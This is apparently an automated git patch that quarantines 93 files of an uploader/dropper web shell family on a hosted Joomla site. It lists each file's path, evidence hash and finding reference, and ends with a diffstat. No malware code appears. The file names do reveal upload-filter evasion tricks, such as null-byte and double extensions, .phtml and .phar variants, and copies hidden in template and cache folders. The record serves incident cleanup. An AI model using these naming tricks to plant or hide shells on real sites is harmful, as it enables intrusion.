From 9ccb96f41818afed7713b24af62edeafe8488656 Mon Sep 17 00:00:00 2001 From: imrcli-remediator Date: Sat, 18 Jul 2026 18:02:05 +0200 Subject: [PATCH] =?UTF-8?q?quarantine:=20family=3Duploader-dropper=20(93?= =?UTF-8?q?=20f=C3=A1jl)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit vhost: www.archlinexp.eu rel_path: 50nnp2o4xt.php.json result: quarantined evidence_sha256: ad4e4ea904d90384d07ccb43d3f371bb03a5a647a997b991aeb4a8df6bc6dfe1 timestamp: 20260718T160204Z finding_ref: 7166 vhost: www.archlinexp.eu rel_path: _h3x_672ba9cf.php.json result: quarantined evidence_sha256: 472487413017cc6446fb867187721d69b79661a600f964661fb0e1e2b3b92d5a timestamp: 20260718T160204Z finding_ref: 4848 vhost: www.archlinexp.eu rel_path: administrator/cache/c_03e0fd55.php.json result: quarantined evidence_sha256: 65fb4317f685e623919513c4acd4adc25b75abfa7894caa022160557b6c90c2d timestamp: 20260718T160204Z finding_ref: 5110 vhost: www.archlinexp.eu rel_path: administrator/cache/c_7f0b46f9.php.json result: quarantined evidence_sha256: 602561117be70a84596af361bdf6b0b623d1144688e46ebec3495df04c7d03b8 timestamp: 20260718T160204Z finding_ref: 5114 vhost: www.archlinexp.eu rel_path: administrator/cache/f46vc3nzn1qw.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 5115 vhost: www.archlinexp.eu rel_path: administrator/components/f46vc3nzn1qw.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 5117 vhost: www.archlinexp.eu rel_path: administrator/f46vc3nzn1qw.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 5099 vhost: www.archlinexp.eu rel_path: administrator/index.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 5100 vhost: www.archlinexp.eu rel_path: administrator/ko6h7s5e9kak.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 5104 vhost: www.archlinexp.eu rel_path: administrator/language/f46vc3nzn1qw.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 5116 vhost: www.archlinexp.eu rel_path: administrator/templates/hathor/index.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 5106 vhost: www.archlinexp.eu rel_path: administrator/templates/isis/index.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 5108 vhost: www.archlinexp.eu rel_path: administrator/yhajxaav.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 5103 vhost: www.archlinexp.eu rel_path: bexkn.php.json result: quarantined evidence_sha256: a9422f224ffc70deb475a1ad4d399a4bfcb87a3a7051341bfd9a8326153416cb timestamp: 20260718T160204Z finding_ref: 4916 vhost: www.archlinexp.eu rel_path: c_03e0fd55.php.json result: quarantined evidence_sha256: 65fb4317f685e623919513c4acd4adc25b75abfa7894caa022160557b6c90c2d timestamp: 20260718T160204Z finding_ref: 4838 vhost: www.archlinexp.eu rel_path: c_7f0b46f9.php.json result: quarantined evidence_sha256: 602561117be70a84596af361bdf6b0b623d1144688e46ebec3495df04c7d03b8 timestamp: 20260718T160204Z finding_ref: 4865 vhost: www.archlinexp.eu rel_path: cache/c_03e0fd55.php.json result: quarantined evidence_sha256: 65fb4317f685e623919513c4acd4adc25b75abfa7894caa022160557b6c90c2d timestamp: 20260718T160204Z finding_ref: 5015 vhost: www.archlinexp.eu rel_path: cache/c_7f0b46f9.php.json result: quarantined evidence_sha256: 602561117be70a84596af361bdf6b0b623d1144688e46ebec3495df04c7d03b8 timestamp: 20260718T160204Z finding_ref: 5022 vhost: www.archlinexp.eu rel_path: cache/f46vc3nzn1qw.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 5023 vhost: www.archlinexp.eu rel_path: cache/yhajxaav.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 5025 vhost: www.archlinexp.eu rel_path: cbdjs.json result: quarantined evidence_sha256: 43c4c299ad5f46e41bc68ab64344acb9d0ee7b1b7344fa284a0570c92a96bd1a timestamp: 20260718T160204Z finding_ref: 4899 vhost: www.archlinexp.eu rel_path: components/com_content/f46vc3nzn1qw.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 5293 vhost: www.archlinexp.eu rel_path: components/f46vc3nzn1qw.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 5292 vhost: www.archlinexp.eu rel_path: cyberdjs.json result: quarantined evidence_sha256: 43c4c299ad5f46e41bc68ab64344acb9d0ee7b1b7344fa284a0570c92a96bd1a timestamp: 20260718T160204Z finding_ref: 4853 vhost: www.archlinexp.eu rel_path: f46vc3nzn1qw.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 4867 vhost: www.archlinexp.eu rel_path: f46vc3nzn1qw.php5.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 4845 vhost: www.archlinexp.eu rel_path: f46vc3nzn1qw.php7.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 4918 vhost: www.archlinexp.eu rel_path: f46vc3nzn1qw.phtml.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 4887 vhost: www.archlinexp.eu rel_path: friska.php.json result: quarantined evidence_sha256: 80d56ff0d995aa16fc2c15e50ea9826d945ce6d52659a46f55e2692a5cac3d0d timestamp: 20260718T160204Z finding_ref: 4898 vhost: www.archlinexp.eu rel_path: images/50nnp2o4xt.php.json result: quarantined evidence_sha256: ad4e4ea904d90384d07ccb43d3f371bb03a5a647a997b991aeb4a8df6bc6dfe1 timestamp: 20260718T160204Z finding_ref: 7195 vhost: www.archlinexp.eu rel_path: images/6iyo68ipsz.php.json result: quarantined evidence_sha256: b3cedb62555690bf309116f07bc6fd9beb53f3f58fd3e5fb1102636b084e5b50 timestamp: 20260718T160204Z finding_ref: 5211 vhost: www.archlinexp.eu rel_path: images/backup.f46vc3nzn1qw.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 5165 vhost: www.archlinexp.eu rel_path: images/c_03e0fd55.php.json result: quarantined evidence_sha256: 65fb4317f685e623919513c4acd4adc25b75abfa7894caa022160557b6c90c2d timestamp: 20260718T160204Z finding_ref: 5147 vhost: www.archlinexp.eu rel_path: images/c_7f0b46f9.php.json result: quarantined evidence_sha256: 602561117be70a84596af361bdf6b0b623d1144688e46ebec3495df04c7d03b8 timestamp: 20260718T160204Z finding_ref: 5164 vhost: www.archlinexp.eu rel_path: images/f46vc3nzn1qw.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 5167 vhost: www.archlinexp.eu rel_path: images/ko6h7s5e9kak.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 5200 vhost: www.archlinexp.eu rel_path: images/ko6h7s5e9kak.phtml.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 5174 vhost: www.archlinexp.eu rel_path: images/temp.f46vc3nzn1qw.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 5180 vhost: www.archlinexp.eu rel_path: images/yhajxaav.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 5193 vhost: www.archlinexp.eu rel_path: joth73.json result: quarantined evidence_sha256: 37153723135d788d7dfa2c8b35a804a39a41c6ad26c4cc263c7e939dc54f1169 timestamp: 20260718T160204Z finding_ref: 4901 vhost: www.archlinexp.eu rel_path: ko6h7s5e9kak.phar.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 4879 vhost: www.archlinexp.eu rel_path: ko6h7s5e9kak.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 4925 vhost: www.archlinexp.eu rel_path: ko6h7s5e9kak.php5.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 4905 vhost: www.archlinexp.eu rel_path: ko6h7s5e9kak.php7.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 4849 vhost: www.archlinexp.eu rel_path: ko6h7s5e9kak.phtml.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 4877 vhost: www.archlinexp.eu rel_path: language/f46vc3nzn1qw.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 5214 vhost: www.archlinexp.eu rel_path: logs/f46vc3nzn1qw.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 5305 vhost: www.archlinexp.eu rel_path: logs/yhajxaav.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 5307 vhost: www.archlinexp.eu rel_path: media/50nnp2o4xt.php.json result: quarantined evidence_sha256: ad4e4ea904d90384d07ccb43d3f371bb03a5a647a997b991aeb4a8df6bc6dfe1 timestamp: 20260718T160204Z finding_ref: 7191 vhost: www.archlinexp.eu rel_path: media/c_03e0fd55.php.json result: quarantined evidence_sha256: 65fb4317f685e623919513c4acd4adc25b75abfa7894caa022160557b6c90c2d timestamp: 20260718T160204Z finding_ref: 4984 vhost: www.archlinexp.eu rel_path: media/c_7f0b46f9.php.json result: quarantined evidence_sha256: 602561117be70a84596af361bdf6b0b623d1144688e46ebec3495df04c7d03b8 timestamp: 20260718T160204Z finding_ref: 4991 vhost: www.archlinexp.eu rel_path: media/f46vc3nzn1qw.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 4992 vhost: www.archlinexp.eu rel_path: media/ko6h7s5e9kak.phtml.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 4994 vhost: www.archlinexp.eu rel_path: media/yhajxaav.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 4997 vhost: www.archlinexp.eu rel_path: modules/f46vc3nzn1qw.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 5283 vhost: www.archlinexp.eu rel_path: modules/mod_custom/f46vc3nzn1qw.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 5284 vhost: www.archlinexp.eu rel_path: templates/50nnp2o4xt.php.json result: quarantined evidence_sha256: ad4e4ea904d90384d07ccb43d3f371bb03a5a647a997b991aeb4a8df6bc6dfe1 timestamp: 20260718T160204Z finding_ref: 7182 vhost: www.archlinexp.eu rel_path: templates/_h3x_672ba9cf.json result: quarantined evidence_sha256: 472487413017cc6446fb867187721d69b79661a600f964661fb0e1e2b3b92d5a timestamp: 20260718T160204Z finding_ref: 4949 vhost: www.archlinexp.eu rel_path: templates/_h3x_672ba9cf.php.json result: quarantined evidence_sha256: 472487413017cc6446fb867187721d69b79661a600f964661fb0e1e2b3b92d5a timestamp: 20260718T160204Z finding_ref: 4948 vhost: www.archlinexp.eu rel_path: templates/beez3/f46vc3nzn1qw.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 4981 vhost: www.archlinexp.eu rel_path: templates/beez3/index.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 4982 vhost: www.archlinexp.eu rel_path: templates/f46vc3nzn1qw.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 4952 vhost: www.archlinexp.eu rel_path: templates/protostar/f46vc3nzn1qw.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 4974 vhost: www.archlinexp.eu rel_path: templates/protostar/index.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 4975 vhost: www.archlinexp.eu rel_path: templates/shaper_helix3/layout/uploader_8kykulyz.php.json.json result: quarantined evidence_sha256: 23f19d3197130f4dd0420a9c51bcb774da4e341c25a7e7033733ba3eb7a4f5b0 timestamp: 20260718T160204Z finding_ref: 4978 vhost: www.archlinexp.eu rel_path: templates/shaper_helix3/layout/uploader_g1jujsa9.php.json.json result: quarantined evidence_sha256: 70eb6bc75669692e1867abe510b7087827fc771ce798ef11aee8d1c0a672c08f timestamp: 20260718T160204Z finding_ref: 4980 vhost: www.archlinexp.eu rel_path: templates/shaper_helix3/layout/uploader_q1z4oez8.php.json.json result: quarantined evidence_sha256: 4c152a15582dde517989ca452df133a2308eeb4410eba39d7bf8d9f278db0a0b timestamp: 20260718T160204Z finding_ref: 4977 vhost: www.archlinexp.eu rel_path: templates/shaper_helix3/layout/uploader_uwqytc5i.php.json.json result: quarantined evidence_sha256: f0cdeea8d9cf8d5eaea2db8c3d42a9a1a475bacadee1bbf47bb5c1cf91233991 timestamp: 20260718T160204Z finding_ref: 4979 vhost: www.archlinexp.eu rel_path: templates/shaper_helixultimate/50nnp2o4xt.php.json result: quarantined evidence_sha256: ad4e4ea904d90384d07ccb43d3f371bb03a5a647a997b991aeb4a8df6bc6dfe1 timestamp: 20260718T160204Z finding_ref: 7188 vhost: www.archlinexp.eu rel_path: templates/shaper_helixultimate/_h3x_672ba9cf.json result: quarantined evidence_sha256: 472487413017cc6446fb867187721d69b79661a600f964661fb0e1e2b3b92d5a timestamp: 20260718T160204Z finding_ref: 4966 vhost: www.archlinexp.eu rel_path: templates/shaper_helixultimate/_h3x_672ba9cf.phar.json result: quarantined evidence_sha256: 472487413017cc6446fb867187721d69b79661a600f964661fb0e1e2b3b92d5a timestamp: 20260718T160204Z finding_ref: 4964 vhost: www.archlinexp.eu rel_path: templates/shaper_helixultimate/_h3x_672ba9cf.php.json result: quarantined evidence_sha256: 472487413017cc6446fb867187721d69b79661a600f964661fb0e1e2b3b92d5a timestamp: 20260718T160204Z finding_ref: 4965 vhost: www.archlinexp.eu rel_path: templates/shaper_helixultimate/_h3x_672ba9cf.php5.json result: quarantined evidence_sha256: 472487413017cc6446fb867187721d69b79661a600f964661fb0e1e2b3b92d5a timestamp: 20260718T160204Z finding_ref: 4961 vhost: www.archlinexp.eu rel_path: templates/shaper_helixultimate/_h3x_672ba9cf.phtml.json result: quarantined evidence_sha256: 472487413017cc6446fb867187721d69b79661a600f964661fb0e1e2b3b92d5a timestamp: 20260718T160204Z finding_ref: 4972 vhost: www.archlinexp.eu rel_path: tmp/c_03e0fd55.php.json result: quarantined evidence_sha256: 65fb4317f685e623919513c4acd4adc25b75abfa7894caa022160557b6c90c2d timestamp: 20260718T160204Z finding_ref: 5216 vhost: www.archlinexp.eu rel_path: tmp/c_7f0b46f9.php.json result: quarantined evidence_sha256: 602561117be70a84596af361bdf6b0b623d1144688e46ebec3495df04c7d03b8 timestamp: 20260718T160204Z finding_ref: 5223 vhost: www.archlinexp.eu rel_path: tmp/f46vc3nzn1qw.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 5224 vhost: www.archlinexp.eu rel_path: tmp/wirrd.php.json result: quarantined evidence_sha256: a9422f224ffc70deb475a1ad4d399a4bfcb87a3a7051341bfd9a8326153416cb timestamp: 20260718T160204Z finding_ref: 5226 vhost: www.archlinexp.eu rel_path: tmp/yhajxaav.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 5227 vhost: www.archlinexp.eu rel_path: uploader.json result: quarantined evidence_sha256: c5010f46b3a71c000b5499d6619b3f42605eeafab2c571a50cf0eef31cb67ff7 timestamp: 20260718T160204Z finding_ref: 4941 vhost: www.archlinexp.eu rel_path: vile.php.json result: quarantined evidence_sha256: 3e8674589c9a7ef3023d4ee162625c603a123d1aa79b09dc9f9b3f0a4e9c279e timestamp: 20260718T160204Z finding_ref: 4937 vhost: www.archlinexp.eu rel_path: wp-blog.php.json result: quarantined evidence_sha256: 11777d2b150bc992e7445519b47ab6eb4bcc9fb490a3a771b6a0709bd805f565 timestamp: 20260718T160204Z finding_ref: 4888 vhost: www.archlinexp.eu rel_path: wp-blog.php.json.json result: quarantined evidence_sha256: 11777d2b150bc992e7445519b47ab6eb4bcc9fb490a3a771b6a0709bd805f565 timestamp: 20260718T160204Z finding_ref: 4874 vhost: www.archlinexp.eu rel_path: yetixx.json result: quarantined evidence_sha256: 4dd9dec92b40075e710ac0864e0a099d9914df74d50ad1c740d7d3228a601426 timestamp: 20260718T160204Z finding_ref: 4839 vhost: www.archlinexp.eu rel_path: yhajxaav.php%00.jpg.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 4929 vhost: www.archlinexp.eu rel_path: yhajxaav.php%00.txt.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 4872 vhost: www.archlinexp.eu rel_path: yhajxaav.php.bak.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 4940 vhost: www.archlinexp.eu rel_path: yhajxaav.php.jpg.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 4834 vhost: www.archlinexp.eu rel_path: yhajxaav.php.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 4911 vhost: www.archlinexp.eu rel_path: yhajxaav.php.txt.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 4932 vhost: www.archlinexp.eu rel_path: yhajxaav.php4.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 4875 vhost: www.archlinexp.eu rel_path: yhajxaav.php5.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 4850 vhost: www.archlinexp.eu rel_path: yhajxaav.phtml.json result: quarantined evidence_sha256: f8434101acb434c1d6e61719fae10373a892218c4ed922e2b980cf8f3dc9f6c0 timestamp: 20260718T160204Z finding_ref: 4944 --- .../archlinexp.eu/www/50nnp2o4xt.php.json | 6 + .../www/50nnp2o4xt.php.json.evidence.json | 15 + .../archlinexp.eu/www/_h3x_672ba9cf.php.json | 32 + .../www/_h3x_672ba9cf.php.json.evidence.json | 15 + .../administrator/cache/c_03e0fd55.php.json | 10 + .../cache/c_03e0fd55.php.json.evidence.json | 15 + .../administrator/cache/c_7f0b46f9.php.json | 10 + .../cache/c_7f0b46f9.php.json.evidence.json | 15 + .../administrator/cache/f46vc3nzn1qw.php.json | 320 ++++++++++ .../cache/f46vc3nzn1qw.php.json.evidence.json | 15 + .../components/f46vc3nzn1qw.php.json | 320 ++++++++++ .../f46vc3nzn1qw.php.json.evidence.json | 15 + .../www/administrator/f46vc3nzn1qw.php.json | 320 ++++++++++ .../f46vc3nzn1qw.php.json.evidence.json | 15 + .../www/administrator/index.php.json | 320 ++++++++++ .../index.php.json.evidence.json | 15 + .../www/administrator/ko6h7s5e9kak.php.json | 320 ++++++++++ .../ko6h7s5e9kak.php.json.evidence.json | 15 + .../language/f46vc3nzn1qw.php.json | 320 ++++++++++ .../f46vc3nzn1qw.php.json.evidence.json | 15 + .../templates/hathor/index.php.json | 320 ++++++++++ .../hathor/index.php.json.evidence.json | 15 + .../templates/isis/index.php.json | 320 ++++++++++ .../isis/index.php.json.evidence.json | 15 + .../www/administrator/yhajxaav.php.json | 320 ++++++++++ .../yhajxaav.php.json.evidence.json | 15 + .../hosting/archlinexp.eu/www/bexkn.php.json | 1 + .../www/bexkn.php.json.evidence.json | 15 + .../archlinexp.eu/www/c_03e0fd55.php.json | 10 + .../www/c_03e0fd55.php.json.evidence.json | 15 + .../archlinexp.eu/www/c_7f0b46f9.php.json | 10 + .../www/c_7f0b46f9.php.json.evidence.json | 15 + .../www/cache/c_03e0fd55.php.json | 10 + .../cache/c_03e0fd55.php.json.evidence.json | 15 + .../www/cache/c_7f0b46f9.php.json | 10 + .../cache/c_7f0b46f9.php.json.evidence.json | 15 + .../www/cache/f46vc3nzn1qw.php.json | 320 ++++++++++ .../cache/f46vc3nzn1qw.php.json.evidence.json | 15 + .../archlinexp.eu/www/cache/yhajxaav.php.json | 320 ++++++++++ .../www/cache/yhajxaav.php.json.evidence.json | 15 + var/www/hosting/archlinexp.eu/www/cbdjs.json | 101 +++ .../www/cbdjs.json.evidence.json | 15 + .../com_content/f46vc3nzn1qw.php.json | 320 ++++++++++ .../f46vc3nzn1qw.php.json.evidence.json | 15 + .../www/components/f46vc3nzn1qw.php.json | 320 ++++++++++ .../f46vc3nzn1qw.php.json.evidence.json | 15 + .../hosting/archlinexp.eu/www/cyberdjs.json | 101 +++ .../www/cyberdjs.json.evidence.json | 15 + .../archlinexp.eu/www/f46vc3nzn1qw.php.json | 320 ++++++++++ .../www/f46vc3nzn1qw.php.json.evidence.json | 15 + .../archlinexp.eu/www/f46vc3nzn1qw.php5.json | 320 ++++++++++ .../www/f46vc3nzn1qw.php5.json.evidence.json | 15 + .../archlinexp.eu/www/f46vc3nzn1qw.php7.json | 320 ++++++++++ .../www/f46vc3nzn1qw.php7.json.evidence.json | 15 + .../archlinexp.eu/www/f46vc3nzn1qw.phtml.json | 320 ++++++++++ .../www/f46vc3nzn1qw.phtml.json.evidence.json | 15 + .../hosting/archlinexp.eu/www/friska.php.json | 1 + .../www/friska.php.json.evidence.json | 15 + .../www/images/50nnp2o4xt.php.json | 6 + .../images/50nnp2o4xt.php.json.evidence.json | 15 + .../www/images/6iyo68ipsz.php.json | 68 +++ .../images/6iyo68ipsz.php.json.evidence.json | 15 + .../www/images/backup.f46vc3nzn1qw.php.json | 320 ++++++++++ ...backup.f46vc3nzn1qw.php.json.evidence.json | 15 + .../www/images/c_03e0fd55.php.json | 10 + .../images/c_03e0fd55.php.json.evidence.json | 15 + .../www/images/c_7f0b46f9.php.json | 10 + .../images/c_7f0b46f9.php.json.evidence.json | 15 + .../www/images/f46vc3nzn1qw.php.json | 320 ++++++++++ .../f46vc3nzn1qw.php.json.evidence.json | 15 + .../www/images/ko6h7s5e9kak.php.json | 320 ++++++++++ .../ko6h7s5e9kak.php.json.evidence.json | 15 + .../www/images/ko6h7s5e9kak.phtml.json | 320 ++++++++++ .../ko6h7s5e9kak.phtml.json.evidence.json | 15 + .../www/images/temp.f46vc3nzn1qw.php.json | 320 ++++++++++ .../temp.f46vc3nzn1qw.php.json.evidence.json | 15 + .../www/images/yhajxaav.php.json | 320 ++++++++++ .../images/yhajxaav.php.json.evidence.json | 15 + var/www/hosting/archlinexp.eu/www/joth73.json | 18 + .../www/joth73.json.evidence.json | 15 + .../archlinexp.eu/www/ko6h7s5e9kak.phar.json | 320 ++++++++++ .../www/ko6h7s5e9kak.phar.json.evidence.json | 15 + .../archlinexp.eu/www/ko6h7s5e9kak.php.json | 320 ++++++++++ .../www/ko6h7s5e9kak.php.json.evidence.json | 15 + .../archlinexp.eu/www/ko6h7s5e9kak.php5.json | 320 ++++++++++ .../www/ko6h7s5e9kak.php5.json.evidence.json | 15 + .../archlinexp.eu/www/ko6h7s5e9kak.php7.json | 320 ++++++++++ .../www/ko6h7s5e9kak.php7.json.evidence.json | 15 + .../archlinexp.eu/www/ko6h7s5e9kak.phtml.json | 320 ++++++++++ .../www/ko6h7s5e9kak.phtml.json.evidence.json | 15 + .../www/language/f46vc3nzn1qw.php.json | 320 ++++++++++ .../f46vc3nzn1qw.php.json.evidence.json | 15 + .../www/logs/f46vc3nzn1qw.php.json | 320 ++++++++++ .../logs/f46vc3nzn1qw.php.json.evidence.json | 15 + .../archlinexp.eu/www/logs/yhajxaav.php.json | 320 ++++++++++ .../www/logs/yhajxaav.php.json.evidence.json | 15 + .../www/media/50nnp2o4xt.php.json | 6 + .../media/50nnp2o4xt.php.json.evidence.json | 15 + .../www/media/c_03e0fd55.php.json | 10 + .../media/c_03e0fd55.php.json.evidence.json | 15 + .../www/media/c_7f0b46f9.php.json | 10 + .../media/c_7f0b46f9.php.json.evidence.json | 15 + .../www/media/f46vc3nzn1qw.php.json | 320 ++++++++++ .../media/f46vc3nzn1qw.php.json.evidence.json | 15 + .../www/media/ko6h7s5e9kak.phtml.json | 320 ++++++++++ .../ko6h7s5e9kak.phtml.json.evidence.json | 15 + .../archlinexp.eu/www/media/yhajxaav.php.json | 320 ++++++++++ .../www/media/yhajxaav.php.json.evidence.json | 15 + .../www/modules/f46vc3nzn1qw.php.json | 320 ++++++++++ .../f46vc3nzn1qw.php.json.evidence.json | 15 + .../modules/mod_custom/f46vc3nzn1qw.php.json | 320 ++++++++++ .../f46vc3nzn1qw.php.json.evidence.json | 15 + .../www/templates/50nnp2o4xt.php.json | 6 + .../50nnp2o4xt.php.json.evidence.json | 15 + .../www/templates/_h3x_672ba9cf.json | 32 + .../_h3x_672ba9cf.json.evidence.json | 15 + .../www/templates/_h3x_672ba9cf.php.json | 32 + .../_h3x_672ba9cf.php.json.evidence.json | 15 + .../www/templates/beez3/f46vc3nzn1qw.php.json | 320 ++++++++++ .../beez3/f46vc3nzn1qw.php.json.evidence.json | 15 + .../www/templates/beez3/index.php.json | 320 ++++++++++ .../beez3/index.php.json.evidence.json | 15 + .../www/templates/f46vc3nzn1qw.php.json | 320 ++++++++++ .../f46vc3nzn1qw.php.json.evidence.json | 15 + .../templates/protostar/f46vc3nzn1qw.php.json | 320 ++++++++++ .../f46vc3nzn1qw.php.json.evidence.json | 15 + .../www/templates/protostar/index.php.json | 320 ++++++++++ .../protostar/index.php.json.evidence.json | 15 + .../layout/uploader_8kykulyz.php.json.json | 12 + ...oader_8kykulyz.php.json.json.evidence.json | 15 + .../layout/uploader_g1jujsa9.php.json.json | 41 ++ ...oader_g1jujsa9.php.json.json.evidence.json | 15 + .../layout/uploader_q1z4oez8.php.json.json | 10 + ...oader_q1z4oez8.php.json.json.evidence.json | 15 + .../layout/uploader_uwqytc5i.php.json.json | 8 + ...oader_uwqytc5i.php.json.json.evidence.json | 15 + 